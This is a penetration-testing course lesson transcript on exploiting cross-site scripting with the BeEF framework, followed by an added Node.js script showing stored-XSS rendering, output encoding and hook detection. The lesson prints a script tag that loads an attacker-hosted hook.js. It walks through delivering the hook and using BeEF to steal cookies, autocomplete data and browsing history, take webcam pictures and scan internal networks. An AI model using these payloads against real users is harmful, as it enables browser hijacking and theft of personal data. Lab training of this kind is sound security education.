Part 10 - Exploiting XSS

Video Activity

This lesson covers exploiting XSS using the BeEF (Browser Exploitation Framework) tool. Hooking a browser with BeEF is a multi-step process: build the hook payload, deliver it through a vulnerable field or a link, wait for the victim to load it, and then run commands against the hooked browser from the BeEF control panel.


Time: 4 hours 20 minutes
Difficulty: Intermediate
CEU/CPE: 5

Video Transcription
00:03
>> Next we're going to use a tool called BeEF. BeEF is a tool which allows you to gain control over somebody's browser. It's very dangerous. But there are a couple of steps we have to do in order to exploit the vulnerability. First we'll need to build the malicious code. Next we have to make the URL, and then finally send that URL to a victim. Then fourth step, profit.

First, we're going to start the BeEF application from the Applications > Exploitation Tools menu. Then after that we're going to browse to 127.0.0.1:3000/ui/authentication, and the username and password will be beef. Let's go do that. Go to Applications, Exploitation Tools, and BeEF XSS Framework. Now, let's go over to our browser here. Type ui/authentication and we have our BeEF page. Username beef, password beef. We are now in. Here's an example of what the hook would be. Now, if you were attacking somebody, you would put your IP address in here, on port 3000, /hook.js, and you would send that to them.

Next, the malicious code will need to be crafted. How you do that is: <script src="http://<attacker IP>:3000/hook.js"></script>. This line can be found when you initially start BeEF up. When you set it up, you get the hook in the example.

The hook will then need to be delivered, and this would be done by placing it in a vulnerable field like we did with our prior example. Or it can be delivered via a link. You can either place it in a form field, and then as users go to that web page they just keep getting hit one by one and just keep becoming bots to BeEF, which is very dangerous. However, if you just want to do a one-off, you just send it to one person, boom, they get hit.

It's an excellent tool to test just how far somebody can interact with your network. If you think, "my intrusion prevention system or my intrusion detection system will stop somebody being able to do this," test it out. See if somebody from the outside can communicate with and control somebody's web browser from the inside of your network.

Then after we deliver the code, we're going to wait for the victim to browse to the site, and then once they do, you'll get a confirmation shown here in the hooked browsers. Let's go put that malicious link into the web page, browse to it, and then see if we become a hooked browser.

Here we are on the BeEF control panel, and we can see that if there were any online browsers, they would show up here. These are all the offline browsers. If you did have a computer hooked at one time, that information will stay here for you to be able to communicate with, or attempt to communicate with, at another time.

Let's come back over here to PentesterLabs. We're going to put it in our script here. The IP address will be our local IP address, 192.168.0.10. Let's submit this query. Let's execute this and see what happens. We get the pop-up from before, and I'm sure some of this information is being sent over now. Look at that, we have a hooked browser.

With this hooked browser, we can see all different information about it, including the cookie and the host's IP address. We know what website it's coming from, the PentesterLab's website, and the IP address the website's coming from. All kinds of nifty information. It's very, very awesome information that you can get from this. Now we have all these different awesome pieces of information about this person who executed this exploit.

One thing we can do is come over here to Logs, and we see different events that have happened. We also come over here to Commands. Now, commands are a pretty awesome tool because the commands list does a lot of different things. For example, if we have a webcam hooked up to the browser, we can actually take a picture through the individual's webcam. We are using a VM environment, so you will have to actually go into your virtual environment's system settings up at the top and add a USB device if you want to be able to take a picture through your VM. However, we're not going to bother with all of that right now.

We can do stuff on here that is pretty awesome. We can play a sound to somebody over their browser, or we can do more malicious things. Things like attempting a browser exploitation automatically, or running a bunch of different cross-site scripting exploits against the individual. If it's green, it means that that person is vulnerable to it. If it's orange, you might be able to get it. If it's red, you're probably not going to get it.

>> You can also do this to get network information as well. You can do ping sweeps internally on something. If you want to get further information on somebody's network, you can have them go to this page, or go to a link that you have this exploit set up at, and you can get further information about the person's internal network.

>> There are also social engineering tools in here as well, if you want to try to use social engineering tools against individuals in your network whom you may be auditing.

How do you use one of these tools? Well, let's detect some extensions. You click on the item and then you click "Execute". Now it checks for Google Chrome, Mozilla Firefox. We're not getting anything back really for this one. But we see the command execute here, and if you click on it you'll get the command results.

Let's try to get URLs that we've gone to. Give us the URLs, execute, come up here. It's not an Avant Browser, so it did not work. But we're going to attempt to give this domains. Let's execute that. It will appear in the executes. We see PentesterLabs freaking out up here because our current program, the BeEF application here, is trying to basically go back and go over all of the different things that we've gone to. Look at that, we've got a whole bunch of different domains, [LAUGHTER] many of which are false results. Wow, really.

Let's get [inaudible] onto that one. Let's execute one of these. I'm going to come over here, and we're going to click "[inaudible] Eye". We're going to execute. Now this takes a picture of the victim's browser. Let's come over here to command 1 and we're going to see the results. This may take a second for the other results to show up.

>> After you click something, do not necessarily just give up real quick, because it will take a moment. If it doesn't work the first time, which it may not, re-execute it a couple of times and see if you gain results. There we go. Fourth attempt, we have a picture of a blog. This is an excellent option to be able to steal things that the person might have typed or might have up on their browser at that time, which is pretty dangerous.

You can also attempt to steal any auto-completes as well. We can click "Execute" on here and we're going to try stealing the auto-completes that may have been on that browser. I believe I have put any auto-completes in, so let's drop down here. Let's do name, we'll execute that one. We'll do username or email. Email. Let's see if we got anything back, so command results got nothing for that one, nothing.

Now the cool thing about this is that you can use it to test and find different types of add-ons that may be on the browser as well. I know I have Firebug. But let's do a detect here and see if it can find Firebug. It executes, come over here to command 2 and look at that, Firebug is enabled and in use. Lots of things you can do with this. Definitely see how far you can get with this tool. Keep poking around and try it out, because it's awesome, all the different things you can do.

We also have the server itself here hooked. You can also do commands against the server itself and try to get information from that web server even further. Yeah, check it out. It's awesome.

What was covered? Well, we covered how to exploit cross-site scripting manually, using redirection and cookie theft. Then we also covered how to exploit cross-site scripting with BeEF. Happy hacking everyone.
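As an added example, not part of the course or of the BeEF project, the following Node.js script shows the delivery step the lesson walks through: the BeEF hook tag stored in a vulnerable comment field and rendered straight back into the page, beside the same field rendered with output encoding so the hook becomes inert text. The attacker address 192.168.0.10 and port 3000/hook.js come from the lesson; the comment field, the `pentesterlab` host name used as the page's own origin, and all helper functions are assumptions made for this example.

```javascript
// Added example (not from the course): how a BeEF hook lands in a page
// through a stored-XSS field, and how output encoding defuses it.
// Attacker IP 192.168.0.10 and the hook path are from the lesson; the
// comment field, own-host name and page HTML are constructed here.

const BEEF_HOOK = '<script src="http://192.168.0.10:3000/hook.js"></script>';

// Minimal HTML escaping for text placed inside an element body or a
// quoted attribute: neutralises the characters that start markup or
// close an attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the stored comment is concatenated into the page as-is,
// which is what the lesson's "vulnerable field" does. Every later visitor
// who loads this page fetches hook.js and becomes a hooked browser.
function renderCommentVulnerable(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Hardened: the same comment rendered as text. The browser shows the
// literal "<script ...>" string and never loads the hook.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Collects the src URLs of <script> elements in rendered HTML, the quick
// "did my injection go live?" check. A regex is adequate for this
// constructed fixture; a real checker would parse the DOM.
function externalScriptSources(html) {
  const out = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["'][^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// True when the page would load a /hook.js from a host other than its own
// origin (assumed here to be the PentesterLab VM, host name "pentesterlab").
function loadsBeefHook(html, ownHost = 'pentesterlab') {
  return externalScriptSources(html).some((src) => {
    try {
      const u = new URL(src);
      return u.pathname.endsWith('/hook.js') && u.hostname !== ownHost;
    } catch (e) {
      return false; // relative or malformed src: not an external hook
    }
  });
}

// Renders the hook through both code paths and reports whether each
// resulting page would hook its visitors.
function demo() {
  const vuln = renderCommentVulnerable(BEEF_HOOK);
  const safe = renderCommentSafe(BEEF_HOOK);
  return {
    vuln,
    safe,
    vulnHooked: loadsBeefHook(vuln), // true
    safeHooked: loadsBeefHook(safe), // false
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  const r = demo();
  console.log('vulnerable render:', r.vuln, '-> hooked:', r.vulnHooked);
  console.log('hardened render:  ', r.safe, '-> hooked:', r.safeHooked);
}
```

Run it with `node` to see the two renders side by side. The same check can be pointed at a saved copy of any page in the lab: if `loadsBeefHook` returns true for HTML fetched from the application, the stored payload is live and every visitor will appear under Hooked Browsers in the BeEF panel.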